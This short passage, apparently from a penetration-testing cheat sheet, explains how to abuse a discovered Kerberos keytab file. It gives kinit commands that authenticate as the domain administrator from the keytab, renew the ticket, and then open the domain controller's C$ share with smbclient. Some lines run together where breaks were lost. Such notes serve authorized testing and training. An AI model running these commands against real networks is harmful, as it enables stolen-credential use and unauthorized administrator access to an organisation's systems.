Stealing Keytab files
If we discover keytab files, we can use these maliciously to gain access to other systems as the domain administrator. To use the file in a script run by the root user, we will use the following syntax.
kinit [email protected] -k -t /tmp/administrator.keytabRenew without entering pass
kinit -RNow that our root user has the keytab files loaded, we can authenticate as the domain admin and access any resources they have access to. Let’s attempt to access the domain controller’s C drive.
smbclient -k -U "CORP1.COM\administrator" //DC01.CORP1.COM/C$Last updated